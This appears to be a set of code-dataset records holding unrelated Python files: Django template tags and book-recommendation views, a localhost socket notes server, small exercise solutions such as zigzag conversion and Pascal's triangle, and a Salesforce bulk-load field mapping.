template.Library()\n\n#######################################################################################################################\n#######################################################################################################################\n\n# For the site administrator, renders an edit link pointing at the given url\nclass FrontAdminNode(Node):\n\tdef __init__(self, url):\n\t\tself.url = url\n\n\tdef render(self, context):\n\t\trequest = context.get('request', None)\n\n\t\tif request and request.user and request.user.is_staff:\n\t\t\ttry:\n\t\t\t\turl = template.Variable(self.url).resolve(context)\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\turl = self.url[1:-1]\n\t\t\t\texcept:\n\t\t\t\t\treturn u''\n\t\t\t# NOTE: the anchor markup was stripped from this copy; a minimal edit link is restored below\n\t\t\treturn u'''\n\t\t\t\t
<a href=\"%s\">edit</a>\n\t\t\t''' % url \n\t\telse:\n\t\t\treturn u''\n\ndef FrontAdmin(parser, token):\n\tbits = token.split_contents()\n\tif len(bits) != 2: raise TemplateSyntaxError('Error token tag \"FrontAdmin\"')\n\treturn FrontAdminNode(bits[1])\n\nregister.tag('FrontAdmin', FrontAdmin)\n\n#######################################################################################################################\n#######################################################################################################################","sub_path":"www/front_admin/templatetags/front_admin_tags.py","file_name":"front_admin_tags.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577637769","text":"class Solution:\n    # @return a string\n    def convert(self, s, nRows):\n        zigzag = [[] for i in xrange(nRows)]\n        base = 2 * nRows - 2\n        for i, c in enumerate(s):\n            index = i % base if base > 0 else 0\n            if index >= nRows: index = nRows * 2 - index - 2\n            zigzag[index].append(c)\n        result = ''\n        for row in zigzag:\n            for c in row:\n                result += c\n        return result","sub_path":"leetcode_python/006_ZigZag_Conversion.py","file_name":"006_ZigZag_Conversion.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"486049281","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport socket\nimport json\nimport uuid\nimport time\n\n\nkeys = [\"id\", \"title\", \"text\", \"date_create\", \"date_update\"]\n\n\n# Builds the reply to the client as a dict with the required keys\ndef send_answer(uuid_note=\"\", title=\"\", text=\"\", date_create=0000000000, date_update=0000000000):\n    send_data = {\"id\": uuid_note, \"title\": title, \"text\": text, \"date_create\": date_create, \"date_update\": date_update}\n    tmp_data = json.dumps(send_data).encode()\n    return tmp_data\n\n\n# Reads every note from the file and returns them as a list of dicts\ndef get_notes():\n    notes = []\n    current_note = {}\n    try:\n        with open(\"notes.txt\", encoding='utf-8') as f:\n            for note in f:\n                note = note.strip().split(',')\n                for n, item in enumerate(keys):\n                    current_note[item] = note[n]\n                notes.append(current_note.copy())\n    except:\n        pass\n    return notes\n\n\n# Writes a new note to the file. Returns the saved note fields on success, an empty list otherwise\ndef save_note(new_note):\n    tmp = []\n    saved_note = []\n    new_note[\"id\"] = str(uuid.uuid4())\n    new_note[\"date_create\"] = int(time.time())\n    new_note[\"date_update\"] = int(time.time())\n\n    for key in new_note:\n        tmp.append(str(new_note[key]))\n    tmp = ','.join(tmp)\n\n    try:\n        with open(\"notes.txt\", \"a\", encoding='utf-8') as f:\n            f.write(tmp + '\\n')\n            print(\"Note created successfully\")\n            saved_note = tmp.strip().split(\",\")\n    except:\n        print(\"Write error\")\n    finally:\n        return saved_note\n\n\n# Takes the id of a note and removes the matching note from storage; returns its fields\ndef del_note(selected_id):\n    readed_notes = get_notes()\n    deleted_note = []\n    for ind, tmp_note in enumerate(readed_notes):\n        if tmp_note[\"id\"] == selected_id:\n            readed_notes.pop(ind)\n            save_all(readed_notes)\n            for key in tmp_note.keys():\n                deleted_note.append(tmp_note[key])\n            break\n    return deleted_note\n\n\n# Takes the edited note and replaces \"title\" and \"text\" of the stored note with the same id,\n# refreshing \"date_update\" along the way. Returns the updated note.\ndef replace_note(new_note):\n    replaced_note = []\n    readed_notes = get_notes()\n    for note in readed_notes:\n        if new_note[\"id\"] == note[\"id\"]:\n            note[\"title\"] = new_note[\"title\"]\n            note[\"text\"] = new_note[\"text\"]\n            note[\"date_update\"] = str(int(time.time()))\n            replaced_note = note\n            break\n    save_all(readed_notes)\n    return replaced_note\n\n\n# Takes a list of note dicts and writes them all back to the file\ndef save_all(notes_to_save):\n    with open(\"notes.txt\", \"w\", encoding=\"utf-8\") as f:\n        for ind, note in enumerate(notes_to_save):\n            tmp = []\n            for key in note:\n                tmp.append(note[key])\n            f.write(','.join(tmp) + '\\n')\n\n\n
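# A hedged client-side sketch (illustrative only; values are made up, the dispatch rules\n# match the main loop below - empty id + non-empty title means \"create\"):\n#\n# import socket, json\n# client = socket.socket()\n# client.connect(('localhost', 8080))\n# note = {\"id\": \"\", \"title\": \"shopping\", \"text\": \"milk\", \"date_create\": 0, \"date_update\": 0}\n# client.sendall(json.dumps(note).encode())\n# print(json.loads(client.recv(1024).decode(\"utf-8\")))  # echoes the stored note back\n\n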
sock = socket.socket()\nsock.bind(('localhost', 8080))\nsock.listen(1)\nconn, addr = sock.accept()\nprint(\"connected:\", addr)\n\nwhile True:\n    data = conn.recv(1024)\n    recieved_data = json.loads(data.decode(\"utf-8\"))\n\n    # Add a note\n    if recieved_data[\"id\"] == \"\" and recieved_data[\"title\"] != \"\":\n        note = save_note(recieved_data)\n        conn.sendall(send_answer(*note))\n\n    # Show the existing notes\n    elif recieved_data[\"id\"] == \"\" and recieved_data[\"title\"] == \"\":\n        notes = get_notes()\n        answer = json.dumps(notes).encode()\n        conn.sendall(answer)\n\n    # Delete a note\n    elif recieved_data[\"id\"] != \"\" and recieved_data[\"title\"] == \"\":\n        note = del_note(recieved_data[\"id\"])\n        print(\"note\", note)\n        conn.sendall(send_answer(*note))\n\n    # Edit a note\n    elif recieved_data[\"id\"] != \"\" and recieved_data[\"title\"] != \"\" and recieved_data[\"text\"] != \"\":\n        note = replace_note(new_note=recieved_data)\n        conn.sendall(send_answer(*note))\n","sub_path":"Server_test.py","file_name":"Server_test.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466769270","text":"#!/usr/bin/env python\n\nimport unittest\nimport os\n\n\ndef cleanup(line):\n\n    return line.strip().strip('\\n').split()\n\n\nclass TestSolution(unittest.TestCase):\n\n\n    def test_cmg_output(self):\n\n        with open('assignment14.out') as f:\n\n            raw_content = f.readlines()\n\n\n        for line in raw_content:\n            clean_line = cleanup(line)\n\n            if clean_line != []:\n                if clean_line[0] == 'Current' and clean_line[1] == 'Fluids':\n                    assert abs(float(clean_line[6]) - float(71256)) < 5\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387501512","text":"def prime_number_of_divisors(n):\n    # count the divisors of n\n    count = 0\n    for x in range(1, n + 1):\n        if n % x == 0:\n            count += 1\n    # then decide whether that count is itself a prime number\n    if count < 2 or (count % 2 == 0 and count > 2):\n        return False\n    for i in range(2, int(count ** 0.5) + 1):\n        if count % i == 0:\n            return False\n    return True\n","sub_path":"week0/simpleAndHarderProblems/primeNumberDivisors.py","file_name":"primeNumberDivisors.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"43625194","text":"import difflib\nimport json\n\nimport pandas as pd\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.humanize.templatetags.humanize import naturaltime\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.http import QueryDict\nfrom 
django.shortcuts import render\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import sigmoid_kernel\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom accounts.models import Profile\nfrom book.models import Book\nfrom book.models import BookReview\nfrom book.utils import googleBooksAPIRequests\n\n\ndef mainpage(request):\n\tif request.method == \"POST\":\n\n\t\tbookSearchQuery = request.POST[\"booksearch\"]\n\t\trequestedBooks = googleBooksAPIRequests(bookSearchQuery)\n\n\t\tif len(requestedBooks) > 0:\n\t\t\tcontext = {\n\t\t\t\t\"bookResults\": requestedBooks,\n\t\t\t\t\"bookSearchQuery\": bookSearchQuery\n\t\t\t}\n\t\t\treturn render(request, \"book/mainpage.html\", context)\n\t\telse:\n\t\t\tcontext = {\n\t\t\t\t\"noResult\": \"Sorry, we could't find any results matching ' {} '\".format(bookSearchQuery)\n\t\t\t}\n\t\treturn render(request, \"book/mainpage.html\", context)\n\n\tcontext = {\n\t\t\"recentlyAddedBooks\": recentlyAddedBooks(),\n\t\t\"booksBasedOnRatings\": booksBasedOnRatings(),\n\t\t\"favouriteBooksFromSimilarUsers\": favouriteBooksFromSimilarUsers(request),\n\t}\n\t\n\treturn render(request, \"book/mainpage.html\", context)\n\ndef bookPage(request, isbn_13):\n\ttry:\n\t\tbook = Book.objects.get(isbn13=isbn_13)\n\texcept Book.DoesNotExist as e:\n\t\traise e\n\n\tif request.user.is_authenticated:\n\t\tif 'visitedBooks' not in request.session:\n\t\t\trequest.session['visitedBooks'] = []\n\n\t\tvisitedBooks = request.session['visitedBooks']\n\n\t\tif isbn_13 not in visitedBooks:\n\t\t\tvisitedBooks.append(isbn_13)\n\t\trequest.session['visitedBooks'] = visitedBooks\n\n\tshelf = {\n\t\t\"inFavourites\": True if request.user in book.isFavourite.all() else False,\n\t\t\"inReadingNow\": True if request.user in book.readingNow.all() else False,\n\t\t\"inToRead\": True if request.user in book.toRead.all() else False,\n\t\t\"inHaveRead\": True if request.user in book.haveRead.all() else False,\n\t}\n\t\n\tcontext = {\n\t\t\"book\": book,\n\t\t\"shelf\": shelf,\n\t\t\"similarBooks\": similarBooks(book),\n\t}\n\treturn render(request, \"book/bookPage.html\", context)\n\n@login_required\ndef bookShelf(request):\n\n\tfavouriteBooks = Book.objects.filter(isFavourite=request.user)\n\treadingNowBooks = Book.objects.filter(readingNow=request.user)\n\ttoReadBooks = Book.objects.filter(toRead=request.user)\n\thaveReadBooks = Book.objects.filter(haveRead=request.user)\n\n\tif 'visitedBooks' not in request.session:\n\t\trequest.session['visitedBooks'] = []\n\n\tcontext = {\n\t\t\"favouriteBooks\": favouriteBooks,\n\t\t\"readingNowBooks\": readingNowBooks,\n\t\t\"toReadBooks\": toReadBooks,\n\t\t\"haveReadBooks\": haveReadBooks,\n\t\t\"visitedBooks\": [ Book.objects.get(isbn13=isbn) for isbn in request.session['visitedBooks'] ],\n\t\t\"personalizedBooks\": []\n\t}\n\treturn render(request, \"book/bookShelf.html\", context)\t\n\ndef getBookReviews(request, *args, **kwargs):\n\n\tbookReviews = BookReview.objects.filter(book__isbn13=kwargs['isbn_13']).prefetch_related('likes', 'dislikes').select_related('creator')\n\n\tif kwargs['orderBy'] == 'NewestFirst':\n\t\tbookReviews = bookReviews.order_by('-createdTime')\n\t\tbookReviewsSplit = [bookReviews[i:i + 15] for i in range(0, len(bookReviews), 15)]\n\n\telif kwargs['orderBy'] == 'OldestFirst':\n\t\tbookReviews = bookReviews.order_by('createdTime')\n\t\tbookReviewsSplit = [bookReviews[i:i + 15] for i in range(0, len(bookReviews), 15)]\n\n\telif kwargs['orderBy'] == 'TopReview':\n\t\tbookReviews = 
sortBookCommentsByLike( bookReviews )\n\t\tbookReviewsSplit = [bookReviews[i:i + 15] for i in range(0, len(bookReviews), 15)]\n\n\ttry:\n\t\tbookReviewsSplitList = bookReviewsSplit[int(kwargs['pagination'])]\n\texcept IndexError:\n\t\tresponse = {\n\t\t\t\"error\": \"IndexError\"\n\t\t}\n\t\treturn HttpResponse(json.dumps(response), content_type=\"application/json\")\n\n\tnewBookReviewsList = [\n\t\t{\n\t\t\t'pk': c.pk,\n\t\t\t'fullName': c.creator.get_full_name(),\n\t\t\t'edited': c.edited,\n\t\t\t'description': c.description,\n\t\t\t'likeCount': c.likes.count(),\n\t\t\t'dislikeCount': c.dislikes.count(),\n\t\t\t'canEdit': c.creator.pk == request.user.pk,\n\t\t\t'createdTime': 'c.createdTime',\n\t\t\t'elapsed': naturaltime(c.createdTime),\n\t\t\t'stars': c.getRatingToStar(),\n\t\t}\n\n\t\tfor c in bookReviewsSplitList\n\t]\n\n\tresponse = {\n\t\t'newBookReviewsList': newBookReviewsList\n\t}\n\treturn JsonResponse(response, status=200)\n\ndef updateShelf(request, *args, **kwargs):\n\t\"\"\"\n\t\tUser adds or removes book from their shelf.\n\t\"\"\"\n\timport time\n\tstart_time = time.time()\n\tif not request.user.is_authenticated:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Login to perform this action.\"\n\t\t}\n\t\treturn JsonResponse(response, status=401)\n\n\tif not request.is_ajax() or kwargs['isbn_13'] == None or kwargs['shelf_type'] == None:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Unable to perform action at this time.\"\n\t\t}\n\t\treturn JsonResponse(response, status=400)\n\n\tbook = Book.objects.get(isbn13=kwargs['isbn_13'])\n\tshelf = {}\n\n\tif request.is_ajax() and request.method == \"POST\":\n\t\tif kwargs['shelf_type'] == 'favourites':\n\t\t\tshelf['inFavourites'] = book.updateIsFavourite(request)\n\t\t\t\n\t\telif kwargs['shelf_type'] == 'readingNow':\n\t\t\tshelf['inReadingNow'] = book.updateReadingNow(request)\n\n\t\telif kwargs['shelf_type'] == 'toRead':\n\t\t\tshelf['inToRead'] = book.updateToRead(request)\n\n\t\telif kwargs['shelf_type'] == 'haveRead':\n\t\t\tshelf['inHaveRead'] = book.updateHaveRead(request)\n\n\tresponse = {\n\t\t\"action\": True,\n\t\t\"message\": \"\",\n\t\t\"shelf\": shelf\n\t}\n\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\treturn JsonResponse(response, status=200)\n\ndef bookComment(request, *args, **kwargs):\n\t\"\"\"\n\t\tUser can create, update and delete comments for a particular book.\n\t\"\"\"\n\t# TODO: if requests can be categorised in request.method then remove kwargs['action'] from url.\n\tif not request.user.is_authenticated:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Login to perform this action.\"\n\t\t}\n\t\treturn JsonResponse(response, status=401)\n\n\tif not request.is_ajax() or kwargs['isbn_13'] == None or kwargs['action'] == None:\n\t\tresponse = {\n\t\t\t\"action\": False,\n\t\t\t\"message\": \"Unable to perform action at this time.\"\n\t\t}\n\t\treturn JsonResponse(response, status=400)\n\n\tbook = Book.objects.get(isbn13=kwargs['isbn_13'])\n\n\tif request.is_ajax() and request.method.lower() == \"delete\":\n\t\tbody = QueryDict(request.body)\n\t\tcommentId = body.get(\"commentId\")\n\t\tBookReview.objects.filter(id=commentId).delete()\n\n\t\tresponse = {\n\t\t\t\"action\": True,\n\t\t}\n\t\treturn JsonResponse(response, status=200)\n\n\tif request.is_ajax() and request.method == \"PUT\":\n\t\tbody = QueryDict(request.body)\n\t\tcommentId = body.get(\"commentId\")\n\t\tfunctionality = body.get(\"functionality\")\n\n\t\tbookReview = 
BookReview.objects.get(id=commentId)\n\n\t\tif functionality == 'likeComment':\n\t\t\tbookReview.likeBookReview(request)\n\n\t\tif functionality == 'dislikeComment':\n\t\t\tbookReview.dislikeBookReview(request)\n\n\t\tresponse = {\n\t\t\t\"action\": True,\n\t\t\t\"likeCount\": bookReview.likes.count(),\n\t\t\t\"dislikeCount\": bookReview.dislikes.count()\n\t\t}\n\t\treturn JsonResponse(response, status=200)\n\n\tif request.is_ajax() and request.method == \"POST\":\n\t\tif kwargs['action'] == 'create':\n\t\t\tbody = QueryDict(request.body)\n\t\t\tnewComment = body.get(\"newComment\")\n\t\t\tstarCount = body.get(\"starCount\")\n\n\t\t\tbookReview = BookReview.objects.create(\n\t\t\t\tbook = book,\n\t\t\t\tcreator = request.user,\n\t\t\t\tdescription = newComment,\n\t\t\t\trating = starCount,\n\t\t\t)\n\n\t\t\tnewRatingsCount = book.cleanData['ratingsCount'] + 1\n\t\t\tnewRatingPointsSum = book.cleanData['ratingsCount']*book.cleanData['averageRating'] + starCount\n\t\t\tnewAverageRating = round(newRatingPointsSum/newRatingsCount, 1)\n\n\t\t\tbook.cleanData['ratingsCount'] = newRatingsCount\n\t\t\tbook.unCleanData['ratingsCount'] = newRatingsCount\n\n\t\t\tbook.cleanData['averageRating'] = newAverageRating\n\t\t\tbook.unCleanData['averageRating'] = newAverageRating\n\t\t\tbook.save()\n\n\t\t\tresponse = {\n\t\t\t\t\"action\": True,\n\t\t\t\t\"bookReview\": {\n\t\t\t\t\t'pk': bookReview.pk,\n\t\t\t\t\t'full_name': bookReview.creator.get_full_name(),\n\t\t\t\t\t'edited': bookReview.edited,\n\t\t\t\t\t'description': bookReview.description,\n\t\t\t\t\t'like_count': 0,\n\t\t\t\t\t'dislike_count': 0,\n\t\t\t\t\t'can_edit': True,\n\t\t\t\t\t'elapsed': naturaltime(bookReview.createdTime),\n\t\t\t\t},\n\t\t\t}\n\t\t\treturn JsonResponse(response, status=200)\n\n\t\telif kwargs['action'] == 'update':\n\t\t\tpass\n\n\t\telif kwargs['action'] == 'delete':\n\t\t\tpass\n\n\treturn JsonResponse({}, status=200)\n\ndef recentlyAddedBooks():\n\tallBooks = Book.objects.all()\n\ttop20Books = allBooks[len(allBooks)-20:] if len(allBooks)>20 else allBooks[:]\n\t\n\trecentlyAddedBooks = [\n\t\t{\n\t\t\t\"isbn13\": i.isbn13,\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\t\n\t\tfor i in top20Books\n\t]\n\treturn recentlyAddedBooks\n\ndef booksBasedOnRatings():\n\tallBooks = Book.objects.all().prefetch_related('isFavourite')\n\n\tif len(allBooks) == 0:\n\t\treturn []\n\n\tdictBooks = {}\n\tfor i in allBooks:\n\n\t\tdictBooks[i.unCleanData[\"isbn13\"]] = {\n\t\t\t\"isbn13\": i.unCleanData[\"isbn13\"],\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\n\n\t\ti.cleanData.pop(\"description\")\n\t\ti.cleanData.pop(\"isbn10\")\n\t\ti.cleanData.pop(\"thumbnail\")\n\t\ti.cleanData.pop(\"uid\")\n\t\ti.cleanData[\"favouritesCount\"] = i.isFavourite.count()\n\n\tallBooksCleaned = [i.cleanData for i in allBooks]\n\n\t# Implementing weighted average for each book's average rating // Non - personalized\n\n\tdf = pd.DataFrame(allBooksCleaned)\n\n\tv = df['ratingsCount']\n\tR = df['averageRating']\n\tC = df['averageRating'].mean()\n\tm = df['ratingsCount'].quantile(0.70)\n\n\tdf['weightedAverage'] = ((R*v) + (C*m))/(v+m)\n\n\t# This is for recommending books to the users based on scaled weighting (50%) and favouritesCount (50%).\n\tscaling = MinMaxScaler()\n\tbookScaled = scaling.fit_transform(df[['weightedAverage', 'favouritesCount']])\n\tbookNormalized = pd.DataFrame(bookScaled, columns=['weightedAverage', 
'favouritesCount'])\n\n\tdf[['normalizedWeightAverage','normalizedPopularity']] = bookNormalized\n\tdf['score'] = df['normalizedWeightAverage'] * 0.5 + df['normalizedPopularity'] * 0.5\n\tbooksScoredFromDf = df.sort_values(['score'], ascending=False)\n\tfinalResult = list(booksScoredFromDf[['isbn13']].head(15)['isbn13'])\n\n\treturn [ dictBooks[isbn] for isbn in finalResult ]\n\ndef similarBooks(book):\n\t\"\"\"\n\t\tMake recommendations based on the books’s description.\n\t\"\"\"\n\tallBooks = Book.objects.all().prefetch_related('isFavourite')\n\n\tif len(allBooks) == 0 or not isinstance(book, Book):\n\t\treturn []\n\n\tdictBooks = {}\n\n\tfor i in allBooks:\n\n\t\tdictBooks[i.unCleanData[\"isbn13\"]] = {\n\t\t\t\"isbn13\": i.unCleanData[\"isbn13\"],\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\n\n\t\ti.cleanData.pop(\"authors\")\n\t\ti.cleanData.pop(\"averageRating\")\n\t\ti.cleanData.pop(\"genre\")\n\t\ti.cleanData.pop(\"isbn10\")\n\t\ti.cleanData.pop(\"publishedDate\")\n\t\ti.cleanData.pop(\"publisher\")\n\t\ti.cleanData.pop(\"ratingsCount\")\n\t\ti.cleanData.pop(\"thumbnail\")\n\t\ti.cleanData.pop(\"uid\")\n\n\tallBooksCleaned = [i.cleanData for i in allBooks]\n\n\tdf = pd.DataFrame(allBooksCleaned)\n\n\ttfidfVectorizer = TfidfVectorizer(\n\t\tmin_df=3, \n\t\tmax_features=None,\n\t\tstrip_accents='unicode',\n\t\tanalyzer='word',\n\t\ttoken_pattern=r'\\w{1,}',\n\t\tngram_range=(1, 3),\n\t\tstop_words = 'english'\n\t)\n\n\tdf['description'] = df['description'].fillna('')\n\ttfvMatrix = tfidfVectorizer.fit_transform(df['description'])\n\tsigmoid = sigmoid_kernel(tfvMatrix, tfvMatrix)\n\tindices = pd.Series(df.index, index=df['title']).drop_duplicates()\n\n\tdef giveRecommendation(title, sigmoid=sigmoid):\n\t try:\n\t idx = indices[title].iloc[0]\n\t except:\n\t \t# couldn't catch specific exception dur to 'numpy.int64' object has no attribute 'iloc'\n\t idx = indices[title]\n\n\t sigmoidScores = list(enumerate(sigmoid[idx]))\n\t sigmoidScores = sorted(sigmoidScores, key=lambda x: x[1], reverse=True)\n\t sigmoidScores = sigmoidScores[1:11]\n\t bookIndices = [i[0] for i in sigmoidScores]\n\t return df['isbn13'].iloc[bookIndices]\n\n\tfinalResult = list(giveRecommendation(book.cleanData['title']))\n\treturn [ dictBooks[isbn] for isbn in finalResult ]\n\ndef favouriteBooksFromSimilarUsers(request):\n\t\"\"\"\n\t\tReturn list of other favourite books from similar user(s).\n\t\tAttributes to determine the similarity: list of favourite books from each user.\n\t\"\"\"\n\tif not request.user.is_authenticated or request.user.is_superuser:\n\t\treturn []\n\n\totherProfiles = Profile.objects.select_related('user').prefetch_related('favouriteGenres').all()\n\tuserGenreIds = [i.pk for i in request.user.profile.favouriteGenres.all()]\n\t\n\tif len(userGenreIds) == 0:\n\t\treturn\n\n\tsimilarityScores = [\n\t\t{\n\t\t\t'userId': p.user.id,\n\t\t\t'similarityScore': difflib.SequenceMatcher(None, userGenreIds, [i.pk for i in p.favouriteGenres.all()] ).ratio()\n\t\t}\n\t\tfor p in otherProfiles if p.user != request.user\n\t]\n\n\tdf = pd.DataFrame(similarityScores)\n\ttopFiveUsers = df.sort_values(by=['similarityScore'], ascending=False).head(5)\n\ttopFiveUserObjects = User.objects.filter(pk__in=list(topFiveUsers['userId']))\n\n\tbookList = Book.objects.filter(isFavourite__in=topFiveUserObjects).exclude(isFavourite=request.user)\n\tbooks = bookList[:20] if len(bookList) > 20 else bookList[:]\n\n\tfavouriteBooks = [\n\t\t{\n\t\t\t\"isbn13\": 
i.unCleanData[\"isbn13\"],\n\t\t\t\"title\": i.unCleanData['title'],\n\t\t\t\"thumbnail\": i.unCleanData['thumbnail']\n\t\t}\n\t\tfor i in books\n\t]\n\n\treturn favouriteBooks\n\ndef sortBookCommentsByLike(bookReviews):\n\t\"\"\"\n\t\tReturn the given book reviews ordered by the most popular comments.\n\t\tAttributes used to determine popularity:\n\t\t\tlikes and dislikes\n\t\"\"\"\n\n\tif len(bookReviews) == 0:\n\t\treturn []\n\n\tbookReviewsDict = [\n\t\t{\n\t\t\t'id': b.pk,\n\t\t\t'likeCount': b.likes.count(),\n\t\t\t'dislikeCount': b.dislikes.count(),\n\t\t}\n\t\tfor b in bookReviews\n\t]\n\n\tdf = pd.DataFrame(bookReviewsDict)\n\tscaling = MinMaxScaler()\n\tdivedent = 100/2\n\n\tbookReviewsScaled = scaling.fit_transform(df[['likeCount', 'dislikeCount']])\n\tbookReivewNormalized = pd.DataFrame(bookReviewsScaled, columns=['likeCount', 'dislikeCount'])\n\n\tdf[['normalizedlikeCount','normalizeddislikeCount']] = bookReivewNormalized\n\tdf['score'] = df['normalizedlikeCount'] * divedent + df['normalizeddislikeCount'] * divedent\n\n\tbookReviewDf = df.sort_values(['score'], ascending=False)\n\tbookReviewId = list(bookReviewDf['id'])\n\treturn [j for i in bookReviewId for j in bookReviews if i == j.pk]","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564632482","text":"class BaseField(object):\n    def __init__(self, id, settings, form):\n        self.id = id\n        self.settings = settings\n        self.form = form\n\n    def render(self, doc=None, edit=False):\n        if doc:\n            field_value = doc.get_item(self.id)\n        else:\n            field_value = self.form.compute_field(self.id, context=self.form)\n            if not field_value:\n                field_value = ''\n        if edit:\n            return self.edit_template.format(id=self.id, value=field_value)\n        else:\n            return self.read_template.format(id=self.id, value=field_value)\n\nclass TextField(BaseField):\n\n    read_template = \"\"\"{value}\"\"\"\n    # NOTE: the original markup was stripped in this copy; a plausible text input is restored here\n    edit_template = \"\"\"<input type=\"text\" name=\"{id}\" value=\"{value}\" />\"\"\"\n\nclass DatetimeField(BaseField):\n\n    read_template = \"\"\"{value}\"\"\"\n    # NOTE: restored likewise; the exact original input type is unknown\n    edit_template = \"\"\"<input type=\"datetime\" name=\"{id}\" value=\"{value}\" />\"\"\"\n
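# Hedged usage sketch (values invented for illustration): render(edit=True) formats the\n# edit_template, e.g. TextField.edit_template.format(id='title', value='hello')\n# -> '<input type=\"text\" name=\"title\" value=\"hello\" />'\n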
\n","sub_path":"rapido/core/fields/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186263127","text":"# Read in the two subject scores\nvalue1 = input(\"Enter the score for the first subject: \")\nvalue2 = input(\"Enter the score for the second subject: \")\n\nvalue1 = int(value1) # convert the string value1 to an integer (type conversion)\nvalue2 = int(value2) # convert the string value2 to an integer (type conversion)\n\nsum = value1 + value2 # total\naverage = sum / 2 # average\n\nprint(\"-\" * 10)\n# print Very Good if the average is >= 95, Just Good otherwise\nif average >= 95 :\n    print(\" Very Good\")\nelse :\n    print(\"Just Good\")\nprint(\"-\" * 10) # ----------","sub_path":"st01.Python기초/py02프로그래밍기초/py02_09ex3_average.py","file_name":"py02_09ex3_average.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"497410182","text":"\"\"\"\nWrite a generator that yields the endless sequence of numbers from Pascal's triangle.\nOnly the generator code itself is submitted; the grading harness imports it and runs a set of tests.\nThe sequence produced by the generator must look like this:\n1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 1 5 10 10 5 1 1 6 15 20 15 6 1 1 7 21 35 35 21 7 1 1 8 28 56 70 56 28 8 1 1 9 36 84 126 126 84 36 9 1 ...\n\nInput format\nThe generator must be implemented as a function without arguments named pascal_triangle.\nThe program text must contain the pascal_triangle generator and all necessary imports.\n\nThe solution file must be named solution.py\n\"\"\"\n\ndef pascal_triangle():\n    line = 0\n    prevLine = [0, 1, 0]\n    newLine = [0, 0]\n    if line == 0:\n        yield 1\n        line += 1\n    while True:\n        for i in range(line + 1):\n            newLine.insert(i+1, prevLine[i]+prevLine[i+1])\n            yield newLine[i+1]\n        prevLine = newLine.copy()\n        newLine = [0, 0]\n        line += 1\n","sub_path":"Contest4/TaskA.py","file_name":"TaskA.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55768259","text":"import json\r\nfrom salesforce_bulk import SalesforceBulk\r\nfrom salesforce_bulk.util import IteratorBytesIO\r\nfrom time import sleep\r\nfrom salesforce_bulk import CsvDictsAdapter\r\nimport pandas as pd\r\nimport config as cfg\r\n# Authentication\r\n\r\nbulk = SalesforceBulk(username=cfg.USERNAME, \r\n\tpassword=cfg.PASSWORD, \r\n\tsecurity_token=cfg.SECURITY_KEY, sandbox=True)\r\n\r\n# Source CSV file path for Account\r\ninput_file = \"/home/baadmin/NCT_ETL/input_files/pg_extract_prd/staging_account_household.csv\"\r\n\r\n# Target SFDC object name\r\ntarget_obj = \"Account\"\r\n\r\n# Mapping of input csv fields to SalesForce fields\r\nsf_mapping = {'accountnumber': 'AccountNumber',\r\n              'accountname': 'Name',\r\n              'accountkey': 'account_Key__c',\r\n              'branchcode': 'Branch_Code__c',\r\n              'branchkey': 'Branch_Key__c',\r\n              'billingstreet': 'Mailing_Street__c',\r\n              'billingcity': 'Mailing_City__c',\r\n              'billingstate': 'Mailing_State__c',\r\n              'billingcountry': 'Mailing_Country__c',\r\n              'billingpostcode': 'Mailing_Postal_Code__c',\r\n              'billinglatitude': 'Mailing_Latitude__c',\r\n              'billinglongitude': 'Mailing_Longtitude__c',\r\n              'psaoffice': 'PSA_Area_Code__c',\r\n              'mobilephone': 'Mobile__c',\r\n              'description': 'description',\r\n              'phone': 'phone',\r\n              'record_type_id': 'RecordTypeId',\r\n              'owner_': 'OwnerId',\r\n              'branch': 'Branch__c',\r\n              'datasource': 'Data_Source__c'\r\n              }\r\n\r\n
